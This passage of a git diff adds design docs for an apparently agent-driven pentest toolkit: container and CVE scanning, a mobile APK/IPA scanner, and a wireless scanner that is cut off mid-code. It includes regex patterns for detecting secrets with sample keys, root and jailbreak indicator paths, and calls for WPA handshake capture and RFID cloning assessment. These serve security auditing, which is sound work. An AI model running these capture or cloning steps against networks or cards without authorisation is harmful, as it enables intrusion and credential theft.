+|------|---------|--------------| +| `docker` | Docker CLI | https://docs.docker.com/get-docker/ | +| `kubectl` | Kubernetes CLI | https://kubernetes.io/docs/tasks/tools/ | +| `trivy` | Image vulnerability scanner | https://aquasecurity.github.io/trivy/ | +| `grype` | Dependency vulnerability scanner | https://github.com/anchore/grype | +| `syft` | SBOM generator | https://github.com/anchore/syft | +| `kubeaudit` | K8s security auditor | https://github.com/Shopify/kubeaudit | + +### APIs Used + +| API | URL | Purpose | +|-----|-----|---------| +| NVD API 2.0 | `https://services.nvd.nist.gov/rest/json/cves/2.0` | CVE data | +| OSV API | `https://api.osv.dev/v1` | Open source vulnerabilities | +| CISA KEV | `https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json` | Known exploited vulnerabilities | + +### Existing Module Dependencies + +- Storage, Bus, Log utilities +- Patterns from: cloudscan, netscan, apiscan modules + +--- + +## Testing + +Run the tests: + +```bash +# CVE module tests +bun test test/pentest/cve.test.ts + +# Container scanner tests +bun test test/pentest/containerscan.test.ts +``` + +## Integration + +Both tools are registered in `src/tool/registry.ts`: +- `CVETool` - Available as `cve` tool +- `ContainerScanTool` - Available as `containerscan` tool + +Exports available from `src/pentest/index.ts`: +- All CVE types, cache, lookup, enricher +- All container scan types, events, storage, profiles +- All parsers (Trivy, Grype, Syft, Kubeaudit) +- All Docker utilities (images, containers, config, secrets) +- All Kubernetes utilities (cluster, pods, rbac, network, secrets, admission) +- All registry integrations (Docker Hub, ECR, ACR, GCR) diff --git a/docs/PHASE13-mobile-app-scanner.md b/docs/PHASE13-mobile-app-scanner.md new file mode 100644 index 00000000000..3fc6f0ca43a --- /dev/null +++ b/docs/PHASE13-mobile-app-scanner.md @@ -0,0 +1,687 @@ +# Phase 13: Mobile Application Scanner + +## Overview + +Phase 13 introduces the **Mobile Application Scanner** (`pentest/mobilescan/`) - a comprehensive security analysis module for Android APK and iOS IPA files, providing OWASP Mobile Top 10 2024 coverage. + +## Module Structure + +``` +src/pentest/mobilescan/ +├── index.ts # Module exports +├── types.ts # MobileScanTypes namespace (Zod schemas) +├── events.ts # MobileScanEvents +├── storage.ts # Scan persistence +├── profiles.ts # Scan profiles +├── tool.ts # MobileScanTool for agent +├── orchestrator.ts # Scan coordination +├── parsers/ +│ ├── index.ts +│ ├── apktool.ts # APKTool output parser +│ ├── jadx.ts # JADX decompiled source parser +│ ├── mobsf.ts # MobSF JSON report parser +│ └── androguard.ts # Androguard analysis parser +├── android/ +│ ├── index.ts +│ ├── manifest.ts # AndroidManifest.xml analysis +│ ├── permissions.ts # Permission risk analysis +│ ├── components.ts # Activity/Service/Receiver analysis +│ └── security.ts # Crypto, storage, network analysis +├── ios/ +│ ├── index.ts +│ ├── plist.ts # Info.plist analysis +│ └── security.ts # Binary, keychain, ATS analysis +└── common/ + ├── index.ts + ├── ssl-pinning.ts # Certificate pinning detection + ├── root-detection.ts # Root/jailbreak detection + ├── obfuscation.ts # Code obfuscation analysis + ├── api-keys.ts # API key extraction with entropy + └── urls.ts # URL/endpoint extraction +``` + +## OWASP Mobile Top 10 2024 Coverage + +| ID | Category | Checks | +|----|----------|--------| +| M1 | Improper Credential Usage | Hardcoded credentials, insecure key storage, credentials in URLs | +| M2 | Inadequate Supply Chain Security | Third-party library analysis, known vulnerabilities | +| M3 | Insecure Authentication/Authorization | Weak auth patterns, missing session management | +| M4 | Insufficient Input/Output Validation | Input validation, SQL injection, path traversal | +| M5 | Insecure Communication | Missing SSL pinning, cleartext traffic, weak TLS | +| M6 | Inadequate Privacy Controls | Excessive permissions, data leakage, tracking | +| M7 | Insufficient Binary Protections | Missing PIE, no obfuscation, debug enabled | +| M8 | Security Misconfiguration | Backup enabled, debug mode, exported components | +| M9 | Insecure Data Storage | Cleartext storage, SQLite, SharedPreferences | +| M10 | Insufficient Cryptography | Weak algorithms, hardcoded keys, insecure random | + +## Usage + +### Basic Analysis + +```typescript +import { MobileScanOrchestrator, MobileScanProfiles } from "./pentest/mobilescan" + +// Full analysis with standard profile +const result = await MobileScanOrchestrator.analyze("/path/to/app.apk", { + profile: "standard" +}) + +console.log(`Platform: ${result.platform}`) +console.log(`Findings: ${result.findings.length}`) +console.log(`Secrets: ${result.secrets.length}`) +console.log(`URLs: ${result.urls.length}`) + +// Quick scan for critical issues +const quickResult = await MobileScanOrchestrator.quickScan("/path/to/app.apk") + +// Get scan status +const status = await MobileScanOrchestrator.getStatus(result.id) + +// List analyzed apps +const apps = await MobileScanOrchestrator.listApps() +``` + +### Android APK Analysis + +```typescript +import { ManifestAnalyzer, PermissionAnalyzer, ComponentAnalyzer, AndroidSecurityAnalyzer } from "./pentest/mobilescan" + +// Parse AndroidManifest.xml +const manifest = await ManifestAnalyzer.parseManifest("/path/to/extracted/AndroidManifest.xml") +console.log(`Package: ${manifest.packageName}`) +console.log(`Debuggable: ${manifest.debuggable}`) +console.log(`Allow Backup: ${manifest.allowBackup}`) +console.log(`Min SDK: ${manifest.minSdkVersion}`) + +// Analyze permissions +const permissions = PermissionAnalyzer.analyzePermissions(manifest.permissions) +console.log(`Total: ${permissions.total}`) +console.log(`Dangerous: ${permissions.dangerous}`) +console.log(`High Risk: ${permissions.highRisk.join(", ")}`) + +// Check unusual permission combinations +const unusual = PermissionAnalyzer.checkUnusualCombinations(manifest.permissions) +for (const combo of unusual) { + console.log(`[!] ${combo}`) +} + +// Analyze exported components +const compFindings = ComponentAnalyzer.analyzeExportedComponents( + manifest, + scanId, + appId, + "android" +) +console.log(`Component issues: ${compFindings.length}`) + +// Full Android security analysis +const securityFindings = await AndroidSecurityAnalyzer.analyzeAll( + extractedDir, + sourceFiles, + scanId, + appId +) +``` + +### iOS IPA Analysis + +```typescript +import { PlistAnalyzer, iOSSecurityAnalyzer } from "./pentest/mobilescan" + +// Parse Info.plist +const plist = await PlistAnalyzer.parsePlist("/path/to/extracted/Info.plist") +console.log(`Bundle ID: ${plist.bundleId}`) +console.log(`Version: ${plist.version}`) +console.log(`Min iOS: ${plist.minOSVersion}`) +console.log(`ATS Allows Arbitrary Loads: ${plist.atsSettings?.allowsArbitraryLoads}`) + +// Analyze ATS settings +const atsFindings = PlistAnalyzer.analyzeATSSettings( + plist.atsSettings, + scanId, + appId, + "ios" +) + +// Full iOS security analysis +const iosFindings = await iOSSecurityAnalyzer.analyzeAll( + extractedDir, + sourceFiles, + scanId, + appId +) +``` + +### Common Analysis Modules + +```typescript +import { + SSLPinningDetector, + RootDetector, + ObfuscationAnalyzer, + ApiKeyExtractor, + UrlExtractor +} from "./pentest/mobilescan" + +// SSL Pinning Detection +const sslResult = await SSLPinningDetector.detect(sourceFiles, "android") +console.log(`SSL Pinning Detected: ${sslResult.detected}`) +if (sslResult.implementation) { + console.log(`Implementation: ${sslResult.implementation}`) +} + +// Root/Jailbreak Detection +const rootResult = await RootDetector.detect(sourceFiles, "android") +console.log(`Root Detection: ${rootResult.detected}`) +console.log(`Methods: ${rootResult.methods.join(", ")}`) +console.log(`Strength: ${rootResult.strength}`) + +// Code Obfuscation Analysis +const obfResult = await ObfuscationAnalyzer.analyze(sourceFiles, "android") +console.log(`Obfuscation Detected: ${obfResult.detected}`) +console.log(`Tool: ${obfResult.tool}`) +console.log(`Strength: ${obfResult.strength}`) + +// API Key Extraction +const secrets = await ApiKeyExtractor.extractFromFiles(sourceFiles) +for (const secret of secrets) { + console.log(`[${secret.type}] ${secret.maskedValue}`) + console.log(` File: ${secret.location.file}:${secret.location.line}`) + console.log(` Confidence: ${secret.confidence}`) + console.log(` Entropy: ${secret.entropy}`) +} + +// URL Extraction +const urls = await UrlExtractor.extractFromFiles(sourceFiles) +const categorized = UrlExtractor.categorizeUrls(urls) +console.log(`API Endpoints: ${categorized.api.length}`) +console.log(`Internal URLs: ${categorized.internal.length}`) +console.log(`Insecure HTTP: ${categorized.insecure.length}`) +console.log(`With Credentials: ${categorized.withCredentials.length}`) +``` + +### Using Parsers + +```typescript +import { ApktoolParser, JadxParser, MobsfParser, AndroguardParser } from "./pentest/mobilescan" + +// Parse APKTool output +const apktoolManifest = ApktoolParser.parseManifest(manifestXml) +const apktoolStrings = ApktoolParser.parseStrings(stringsXml) + +// Parse JADX decompiled sources +const jadxStrings = JadxParser.extractStrings(sourceFiles) +const jadxUrls = JadxParser.extractUrls(sourceFiles) +const jadxApiKeys = await JadxParser.extractApiKeys(sourceFiles) + +// Parse MobSF report +const mobsfReport = MobsfParser.parseAndroidReport(jsonReport, scanId, appId) +console.log(`Findings: ${mobsfReport.findings.length}`) +console.log(`Secrets: ${mobsfReport.secrets.length}`) +console.log(`Security Score: ${mobsfReport.securityScore}`) + +// Parse Androguard output +const androguardResult = AndroguardParser.parseAnalysis(jsonOutput, scanId, appId, "android") +``` + +## Tool Actions + +| Action | Description | +|--------|-------------| +| `analyze` | Full analysis with specified profile | +| `quick-scan` | Fast scan for critical issues only | +| `manifest` | Analyze AndroidManifest.xml or Info.plist | +| `permissions` | Permission risk analysis | +| `network` | Network security configuration analysis | +| `storage` | Data storage security analysis | +| `crypto` | Cryptographic implementation review | +| `secrets` | Hardcoded secrets/API key detection | +| `ssl-pinning` | Certificate pinning detection | +| `binary` | Binary protection analysis | +| `components` | Exported components analysis (Android) | +| `decompile` | Decompile APK/IPA for manual review | +| `sbom` | Generate software bill of materials | +| `status` | Get scan status | +| `apps` | List analyzed apps | +| `findings` | Get findings for a scan | +| `profiles` | List available scan profiles | + +## Scan Profiles + +| Profile | Static Analysis | Decompile | External Tools | Use Case | +|---------|-----------------|-----------|----------------|----------| +| `discovery` | Manifest only | No | APKTool | Quick app identification | +| `quick` | Critical checks | No | APKTool | Fast triage scan | +| `standard` | Full analysis | Partial | APKTool, JADX | Regular security assessment | +| `thorough` | Full + libraries | Full | All tools | Comprehensive audit | +| `compliance` | OWASP checks | Full | MobSF | Compliance verification | + +## Security Checks + +### Android Checks + +| Check | Severity | OWASP | Description | +|-------|----------|-------|-------------| +| Debuggable App | Critical | M8 | android:debuggable="true" | +| Allow Backup | High | M9 | android:allowBackup="true" | +| Cleartext Traffic | High | M5 | usesCleartextTraffic="true" | +| Exported Components | Medium-Critical | M8 | Unprotected activities/services/receivers | +| Dangerous Permissions | Varies | M6 | READ_CONTACTS, CAMERA, LOCATION, etc. | +| Weak Crypto | High | M10 | DES, MD5, SHA1, ECB mode | +| Hardcoded Keys | Critical | M1 | API keys, secrets in code | +| Insecure Storage | High | M9 | MODE_WORLD_READABLE/WRITABLE | +| SQL Injection | High | M4 | Raw queries with concatenation | +| Missing SSL Pinning | Medium | M5 | No certificate pinning | +| Missing Root Detection | Low | M7 | No root/emulator detection | +| No Obfuscation | Low | M7 | Easily reverse-engineered | + +### iOS Checks + +| Check | Severity | OWASP | Description | +|-------|----------|-------|-------------| +| ATS Disabled | High | M5 | NSAllowsArbitraryLoads = YES | +| Missing PIE | High | M7 | Position Independent Executable disabled | +| Missing ARC | Medium | M7 | Automatic Reference Counting disabled | +| No Stack Canary | High | M7 | Stack smashing protection disabled | +| Symbols Not Stripped | Low | M7 | Debug symbols exposed | +| Weak Crypto | High | M10 | Insecure algorithms | +| Hardcoded Keys | Critical | M1 | API keys, secrets in code | +| Insecure Keychain | High | M9 | kSecAttrAccessibleAlways | +| Missing Jailbreak Detection | Low | M7 | No jailbreak detection | +| Insecure URL Schemes | Medium | M8 | Custom URL scheme vulnerabilities | + +## Events + +| Event | Description | +|-------|-------------| +| `pentest.mobilescan.scan_started` | Scan began | +| `pentest.mobilescan.scan_completed` | Scan finished | +| `pentest.mobilescan.scan_failed` | Scan failed | +| `pentest.mobilescan.app_analyzed` | App metadata extracted | +| `pentest.mobilescan.finding_detected` | Security issue found | +| `pentest.mobilescan.secret_found` | Hardcoded secret detected | +| `pentest.mobilescan.permission_risk` | Risky permission identified | +| `pentest.mobilescan.ssl_pinning_missing` | No SSL pinning detected | +| `pentest.mobilescan.component_exported` | Unprotected component found | + +## Data Types + +### MobileApp + +```typescript +{ + id: string // Unique app ID + sessionId: string // Session ID + platform: "android" | "ios" + name: string // App name + packageName: string // com.example.app or bundle ID + version: string + minSdkVersion?: number // Android only + targetSdkVersion?: number // Android only + minOSVersion?: string // iOS only + filePath: string + fileHash: string + size: number + analyzedAt: number +} +``` + +### MobileScanResult + +```typescript +{ + id: string + appId: string + app: MobileApp + profile: string + platform: "android" | "ios" + status: "pending" | "running" | "completed" | "failed" + findings: MobileFinding[] + manifest?: AndroidManifest | IOSPlist + permissions?: PermissionAnalysis + networkSecurity?: NetworkSecurityAnalysis + binaryProtections?: BinaryProtections + storageAnalysis?: StorageAnalysis + cryptoAnalysis?: CryptoAnalysis + rootDetection?: RootDetectionResult + obfuscation?: ObfuscationResult + secrets: ExtractedSecret[] + urls: ExtractedURL[] + libraries: ThirdPartyLibrary[] + stats: ScanStats + startTime: number + endTime?: number + error?: string +} +``` + +### MobileFinding + +```typescript +{ + id: string + scanId: string + appId: string + platform: "android" | "ios" + title: string + description: string + severity: "critical" | "high" | "medium" | "low" | "info" + owaspMobile: "M1" | "M2" | ... | "M10" + category: string // manifest, permissions, crypto, etc. + component?: string // Activity, Service, etc. + codeLocation?: { + file: string + line?: number + snippet?: string + } + evidence?: string + cwe?: string + cvss?: number + recommendation?: string + references?: string[] + falsePositive: boolean + verified: boolean + detectedAt: number +} +``` + +### ExtractedSecret + +```typescript +{ + id: string + type: "api_key" | "aws_key" | "gcp_key" | "firebase_key" | + "private_key" | "jwt_secret" | "oauth_secret" | + "database_credential" | "generic_secret" | ... + value: string + maskedValue: string + location: { + file: string + line?: number + snippet?: string + } + confidence: "high" | "medium" | "low" + entropy?: number + context?: string +} +``` + +## External Tools + +### Required Tools + +| Tool | Purpose | Command | Installation | +|------|---------|---------|--------------| +| APKTool | APK unpacking | `apktool d app.apk -o output/` | https://ibotpeaches.github.io/Apktool/ | +| JADX | Java decompilation | `jadx -d output/ app.apk` | https://github.com/skylot/jadx | + +### Optional Tools + +| Tool | Purpose | Command | Installation | +|------|---------|---------|--------------| +| MobSF | Full mobile analysis | REST API | https://github.com/MobSF/Mobile-Security-Framework-MobSF | +| Androguard | Python analysis | `androguard analyze app.apk` | https://github.com/androguard/androguard | +| aapt2 | APK metadata | `aapt2 dump badging app.apk` | Android SDK | +| dex2jar | DEX conversion | `d2j-dex2jar app.apk` | https://github.com/pxb1988/dex2jar | +| Frida | Dynamic analysis | `frida -U -f package` | https://frida.re/ | +| objection | Runtime manipulation | `objection explore` | https://github.com/sensepost/objection | + +## Example Use Cases + +### Use Case 1: Pre-Release Security Audit + +Perform a thorough security assessment before app release. + +```bash +# Full analysis with thorough profile +mobilescan analyze file=/path/to/release.apk profile=thorough + +# Check findings +mobilescan findings scanId=mobilescan_abc123 severity=critical + +# Generate SBOM for compliance +mobilescan sbom file=/path/to/release.apk +``` + +### Use Case 2: Quick Triage of Multiple Apps + +Quickly identify critical issues across multiple applications. + +```bash +# Quick scan each app +mobilescan quick-scan file=/path/to/app1.apk +mobilescan quick-scan file=/path/to/app2.apk +mobilescan quick-scan file=/path/to/app3.apk + +# List all analyzed apps +mobilescan apps +``` + +### Use Case 3: API Security Review + +Focus on API communication and secrets. + +```bash +# Check for hardcoded secrets +mobilescan secrets file=/path/to/app.apk + +# Analyze SSL pinning +mobilescan ssl-pinning file=/path/to/app.apk + +# Review network security config +mobilescan network file=/path/to/app.apk +``` + +### Use Case 4: Permission Audit + +Review app permissions for privacy compliance. + +```bash +# Analyze permissions +mobilescan permissions file=/path/to/app.apk +``` + +Example output: +``` +Permission Analysis +======================================== +Total Permissions: 15 +Dangerous: 5 +Normal: 8 +Signature: 2 +Custom: 0 + +High Risk Permissions: + [!] android.permission.READ_CONTACTS + [!] android.permission.ACCESS_FINE_LOCATION + [!] android.permission.CAMERA + +Unusual Combinations: + [!] App requests both CAMERA and RECORD_AUDIO without media features + [!] App requests SMS and CONTACTS - potential data harvesting + +Recommendations: + - Review necessity of READ_CONTACTS permission + - Consider using ACCESS_COARSE_LOCATION instead of ACCESS_FINE_LOCATION +``` + +### Use Case 5: Decompile for Manual Review + +Extract and decompile app for manual code review. + +```bash +# Decompile to directory +mobilescan decompile file=/path/to/app.apk outputDir=/tmp/decompiled + +# Manual review +ls /tmp/decompiled/ +# AndroidManifest.xml +# res/ +# smali/ +# sources/ (if JADX available) +``` + +### Use Case 6: iOS App Security Assessment + +Analyze iOS IPA file. + +```bash +# Full iOS analysis +mobilescan analyze file=/path/to/app.ipa profile=standard + +# Check binary protections +mobilescan binary file=/path/to/app.ipa +``` + +Example output: +``` +Binary Protection Analysis +======================================== +PIE (ASLR): Yes +ARC: Yes +Stack Canary: Yes +Symbols Stripped: No (symbols exposed) +Encrypted: Yes + +Root/Jailbreak Detection: + Detected: Yes + Methods: fileExistsAtPath, canOpenURL, fopen + Strength: medium + +Code Obfuscation: + Detected: No +``` + +### Use Case 7: Continuous Integration + +Integrate into CI/CD pipeline. + +```typescript +import { MobileScanOrchestrator } from "./pentest/mobilescan" + +async function securityGate(apkPath: string): Promise { + const result = await MobileScanOrchestrator.analyze(apkPath, { + profile: "quick" + }) + + const criticalFindings = result.findings.filter(f => f.severity === "critical") + const highFindings = result.findings.filter(f => f.severity === "high") + + if (criticalFindings.length > 0) { + console.error(`FAILED: ${criticalFindings.length} critical findings`) + for (const f of criticalFindings) { + console.error(` - ${f.title} (${f.owaspMobile})`) + } + return false + } + + if (highFindings.length > 5) { + console.error(`FAILED: Too many high-severity findings (${highFindings.length})`) + return false + } + + console.log("PASSED: Security gate checks") + return true +} +``` + +## Storage + +Scan data is persisted in: + +``` +pentest/mobilescan/ + scans/ + mobilescan_abc123.json # Scan results + apps/ + app_def456.json # App metadata + findings/ + finding_ghi789.json # Individual findings + secrets/ + secret_jkl012.json # Extracted secrets +``` + +## Testing + +Run the tests: + +```bash +bun test test/pentest/mobilescan.test.ts +``` + +## Integration + +The tool is registered in `src/tool/registry.ts`: +- `MobileScanTool` - Available as `mobilescan` tool + +Exports available from `src/pentest/index.ts`: +- All types: `MobileScanTypes` +- Events: `MobileScanEvents` +- Storage: `MobileScanStorage` +- Profiles: `MobileScanProfiles` +- Orchestrator: `MobileScanOrchestrator` +- Tool: `MobileScanTool` +- Parsers: `ApktoolParser`, `JadxParser`, `MobsfParser`, `AndroguardParser` +- Android: `ManifestAnalyzer`, `PermissionAnalyzer`, `ComponentAnalyzer`, `AndroidSecurityAnalyzer` +- iOS: `PlistAnalyzer`, `iOSSecurityAnalyzer` +- Common: `SSLPinningDetector`, `RootDetector`, `ObfuscationAnalyzer`, `ApiKeyExtractor`, `UrlExtractor` + +## API Key Detection Patterns + +The scanner detects the following secret patterns: + +| Type | Pattern | Example | +|------|---------|---------| +| AWS Access Key | `AKIA[0-9A-Z]{16}` | AKIAIOSFODNN7EXAMPLE | +| AWS Secret Key | `[A-Za-z0-9/+=]{40}` | wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY | +| Google API Key | `AIza[0-9A-Za-z_-]{35}` | AIzaSyDaGmWKa4JsXZ-HjGw7ISLn_3namBGewQe | +| Firebase Key | `AIza[0-9A-Za-z_-]{35}` | AIzaSyClzfrOzB818x55FASHvX4JuGQciR9lv7q | +| GitHub Token | `gh[pousr]_[A-Za-z0-9_]{36}` | ghp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx | +| Private Key | `-----BEGIN.*PRIVATE KEY-----` | RSA, EC, DSA private keys | +| JWT Secret | High entropy strings in JWT context | - | +| Generic API Key | `[A-Za-z0-9_-]{20,}` with high entropy | - | + +## SSL Pinning Detection Patterns + +### Android + +| Implementation | Pattern | +|----------------|---------| +| OkHttp CertificatePinner | `CertificatePinner.Builder()` | +| Network Security Config | `pin-set` in XML | +| TrustManager | `X509TrustManager`, `checkServerTrusted` | +| Retrofit | `certificatePinner` | + +### iOS + +| Implementation | Pattern | +|----------------|---------| +| URLSession | `URLSessionDelegate`, `didReceiveChallenge` | +| TrustKit | `TrustKit`, `TSKPinningValidator` | +| Alamofire | `ServerTrustManager`, `PinnedCertificatesTrustEvaluator` | +| AFNetworking | `AFSecurityPolicy`, `pinnedCertificates` | + +## Root/Jailbreak Detection Patterns + +### Android Root Detection + +| Check | Description | +|-------|-------------| +| Su binary | `/system/xbin/su`, `/system/bin/su` | +| Superuser app | `/system/app/Superuser.apk` | +| Magisk | `magisk`, `MagiskManager` | +| Build tags | `test-keys` | +| Dangerous props | `ro.debuggable=1` | +| RW system | Writable system partition | + +### iOS Jailbreak Detection + +| Check | Description | +|-------|-------------| +| Cydia | `/Applications/Cydia.app` | +| Substrate | `/Library/MobileSubstrate` | +| SSH | `/usr/sbin/sshd`, `/usr/bin/ssh` | +| Apt | `/etc/apt` | +| URL schemes | `cydia://` | +| Fork | `fork()` behavior | diff --git a/docs/PHASE14-wireless-scanner.md b/docs/PHASE14-wireless-scanner.md new file mode 100644 index 00000000000..c7e10e2470c --- /dev/null +++ b/docs/PHASE14-wireless-scanner.md @@ -0,0 +1,625 @@ +# Phase 14: Wireless Network Scanner + +## Overview + +Phase 14 introduces the **Wireless Network Scanner** (`pentest/wirelessscan/`) - a comprehensive security scanner for WiFi, Bluetooth, and RFID/NFC technologies, providing vulnerability assessment and rogue device detection. + +## Module Structure + +``` +src/pentest/wirelessscan/ +├── index.ts # Module exports +├── types.ts # WirelessScanTypes namespace (Zod schemas) +├── events.ts # WirelessScanEvents +├── storage.ts # Scan persistence +├── profiles.ts # Scan profiles +├── tool.ts # WirelessScanTool for agent +├── orchestrator.ts # Scan coordination +├── parsers/ +│ ├── index.ts +│ ├── aircrack.ts # Aircrack-ng output parser +│ ├── kismet.ts # Kismet output parser +│ ├── bettercap.ts # Bettercap output parser +│ ├── ubertooth.ts # Ubertooth output parser +│ └── hcxtools.ts # Hcxtools output parser +├── wifi/ +│ ├── index.ts +│ ├── discovery.ts # WiFi network discovery +│ ├── security.ts # WPA/WPA2/WPA3 assessment +│ ├── rogue-ap.ts # Rogue AP and evil twin detection +│ ├── clients.ts # Client enumeration +│ ├── handshake.ts # Handshake capture and analysis +│ └── deauth.ts # Deauthentication detection +├── bluetooth/ +│ ├── index.ts +│ ├── discovery.ts # Bluetooth device discovery +│ ├── ble.ts # BLE service enumeration +│ ├── classic.ts # Classic Bluetooth scanning +│ ├── profiles.ts # Bluetooth profile analysis +│ └── vulnerabilities.ts # BlueBorne, KNOB, BIAS checks +└── rfid/ + ├── index.ts + ├── discovery.ts # RFID/NFC tag discovery + ├── readers.ts # Reader detection and enumeration + ├── cards.ts # Card type identification + ├── cloning.ts # Cloning vulnerability assessment + └── vulnerabilities.ts # RFID-specific vulnerabilities +``` + +## Capabilities + +### WiFi Security Assessment + +| Feature | Description | +|---------|-------------| +| Network Discovery | Enumerate all visible WiFi networks with metadata | +| WPA/WPA2 Assessment | Security configuration analysis | +| WPA3 Assessment | SAE and OWE implementation checks | +| KRACK Detection | Key Reinstallation Attack vulnerability | +| Dragonblood Detection | WPA3 implementation flaws | +| PMKID Capture | PMKID-based attack capability check | +| Rogue AP Detection | Identify unauthorized access points | +| Evil Twin Detection | Detect spoofed SSIDs | +| Client Enumeration | Connected client analysis with OUI lookup | +| Probe Analysis | Client probe request monitoring | +| Handshake Capture | WPA 4-way handshake capture and validation | +| Deauth Detection | Deauthentication attack monitoring | +| WPS Assessment | WPS security and lockout status | + +### Bluetooth Security Assessment + +| Feature | Description | +|---------|-------------| +| Device Discovery | Classic and BLE device enumeration | +| Service Enumeration | Bluetooth service and profile discovery | +| BlueBorne Detection | CVE-2017-0781 and related vulnerabilities | +| KNOB Attack | Key Negotiation of Bluetooth vulnerability | +| BIAS Attack | Bluetooth Impersonation Attack check | +| BLESA Attack | BLE Spoofing Attack vulnerability | +| BLE Security | BLE pairing and encryption analysis | +| Device Classification | Device type and manufacturer identification | + +### RFID/NFC Security Assessment + +| Feature | Description | +|---------|-------------| +| Tag Discovery | Automatic tag detection and identification | +| MIFARE Classic | Default key and crypto-1 vulnerability checks | +| MIFARE DESFire | Security level assessment | +| NTAG Support | NTAG213/215/216 analysis | +| HID Support | HID access card assessment | +| EM4100 Support | Low-frequency tag analysis | +| Cloning Assessment | Cloning vulnerability evaluation | +| Key Analysis | Key reuse and weak key detection | + +## Usage + +### Basic Wireless Scan + +```typescript +import { WirelessScanOrchestrator, WirelessScanProfiles } from "./pentest/wirelessscan" + +// Full wireless scan with standard profile +const result = await WirelessScanOrchestrator.scan({ + profile: "standard", + interface: "wlan0", + duration: 60 // seconds +}) + +console.log(`WiFi Networks: ${result.wifi.networks.length}`) +console.log(`Bluetooth Devices: ${result.bluetooth.devices.length}`) +console.log(`RFID Tags: ${result.rfid.tags.length}`) +console.log(`Findings: ${result.findings.length}`) + +// Get scan status +const status = await WirelessScanOrchestrator.getStatus(result.id) + +// List all scans +const scans = await WirelessScanOrchestrator.listScans() +``` + +### WiFi-Specific Scanning + +```typescript +import { WiFiDiscovery, WiFiSecurity, WiFiRogueAP, WiFiHandshake, WiFiClients } from "./pentest/wirelessscan" + +// Discover WiFi networks +const networks = await WiFiDiscovery.scan({ + interface: "wlan0mon", + duration: 30, + channels: [1, 6, 11] +}) + +for (const network of networks) { + console.log(`${network.essid} (${network.bssid})`) + console.log(` Channel: ${network.channel}`) + console.log(` Encryption: ${network.encryption}`) + console.log(` Signal: ${network.signal} dBm`) +} + +// Security assessment +const security = await WiFiSecurity.assess(network) +console.log(`WPA Version: ${security.wpaVersion}`) +console.log(`KRACK Vulnerable: ${security.krackVulnerable}`) +console.log(`PMKID Capturable: ${security.pmkidVulnerable}`) + +// Rogue AP detection +const rogueAPs = await WiFiRogueAP.detect({ + interface: "wlan0mon", + knownNetworks: ["Corp-WiFi", "Guest-WiFi"] +}) + +for (const rogue of rogueAPs) { + console.log(`[!] Rogue AP: ${rogue.essid} (${rogue.bssid})`) + console.log(` Type: ${rogue.type}`) // evil_twin, unauthorized, etc. + console.log(` Risk: ${rogue.risk}`) +} + +// Client enumeration +const clients = await WiFiClients.enumerate({ + interface: "wlan0mon", + bssid: "AA:BB:CC:DD:EE:FF" +}) + +for (const client of clients) { + console.log(`Client: ${client.mac}`) + console.log(` Vendor: ${client.vendor}`) + console.log(` Probes: ${client.probes.join(", ")}`) +} + +// Handshake capture +const handshake = await WiFiHandshake.capture({ + interface: "wlan0mon", + bssid: "AA:BB:CC:DD:EE:FF", + timeout: 120 +}) + +if (handshake.complete) { + console.log(`Handshake captured: ${handshake.file}`) + console.log(`Type: ${handshake.type}`) // 4-way, pmkid +} +``` + +### Bluetooth Scanning + +```typescript +import { BluetoothDiscovery, BluetoothBLE, BluetoothClassic, BluetoothVulnerabilities } from "./pentest/wirelessscan" + +// Discover Bluetooth devices +const devices = await BluetoothDiscovery.scan({ + duration: 30, + bleOnly: false, + classicOnly: false +}) + +for (const device of devices) { + console.log(`${device.name || "Unknown"} (${device.address})`) + console.log(` Type: ${device.type}`) // classic, ble, dual + console.log(` Class: ${device.deviceClass}`) + console.log(` Vendor: ${device.vendor}`) +} + +// BLE service enumeration +const services = await BluetoothBLE.enumerateServices(device.address) +for (const service of services) { + console.log(`Service: ${service.uuid}`) + console.log(` Name: ${service.name}`) + for (const char of service.characteristics) { + console.log(` Characteristic: ${char.uuid}`) + } +} + +// Vulnerability checks +const vulns = await BluetoothVulnerabilities.check(device) +console.log(`BlueBorne: ${vulns.blueBorne}`) +console.log(`KNOB: ${vulns.knob}`) +console.log(`BIAS: ${vulns.bias}`) +console.log(`BLESA: ${vulns.blesa}`) +``` + +### RFID/NFC Scanning + +```typescript +import { RFIDDiscovery, RFIDReaders, RFIDCards, RFIDCloning, RFIDVulnerabilities } from "./pentest/wirelessscan" + +// Detect readers +const readers = await RFIDReaders.detect() +for (const reader of readers) { + console.log(`Reader: ${reader.name}`) + console.log(` Type: ${reader.type}`) // proxmark3, acr122u, etc. + console.log(` Frequencies: ${reader.frequencies.join(", ")}`) +} + +// Discover tags +const tags = await RFIDDiscovery.scan({ + reader: readers[0].name, + frequency: "13.56mhz" +}) + +for (const tag of tags) { + console.log(`Tag: ${tag.uid}`) + console.log(` Type: ${tag.type}`) // mifare_classic, desfire, ntag, etc. + console.log(` Size: ${tag.size} bytes`) +} + +// Card analysis +const cardInfo = await RFIDCards.analyze(tag) +console.log(`Sectors: ${cardInfo.sectors}`) +console.log(`Keys Found: ${cardInfo.keysFound}`) +console.log(`Default Keys: ${cardInfo.defaultKeys}`) + +// Cloning assessment +const clonable = await RFIDCloning.assess(tag) +console.log(`Clonable: ${clonable.vulnerable}`) +console.log(`Method: ${clonable.method}`) +console.log(`Difficulty: ${clonable.difficulty}`) + +// Vulnerability checks +const rfidVulns = await RFIDVulnerabilities.check(tag) +console.log(`Crypto-1 Weak: ${rfidVulns.crypto1Weak}`) +console.log(`Default Keys: ${rfidVulns.defaultKeys}`) +console.log(`Replay Possible: ${rfidVulns.replayPossible}`) +``` + +### Using Parsers + +```typescript +import { AircrackParser, KismetParser, BettercapParser, UbertoothParser, HcxToolsParser } from "./pentest/wirelessscan" + +// Parse Aircrack-ng output +const airodumpOutput = await fs.readFile("/tmp/scan-01.csv", "utf-8") +const aircrackResult = AircrackParser.parseCSV(airodumpOutput) +console.log(`Networks: ${aircrackResult.networks.length}`) +console.log(`Clients: ${aircrackResult.clients.length}`) + +// Parse Kismet output +const kismetOutput = await fs.readFile("/tmp/kismet.json", "utf-8") +const kismetResult = KismetParser.parseJSON(kismetOutput) + +// Parse Bettercap output +const bettercapOutput = await fs.readFile("/tmp/bettercap.json", "utf-8") +const bettercapResult = BettercapParser.parseJSON(bettercapOutput) + +// Parse Ubertooth output +const ubertoothOutput = await fs.readFile("/tmp/ubertooth.txt", "utf-8") +const 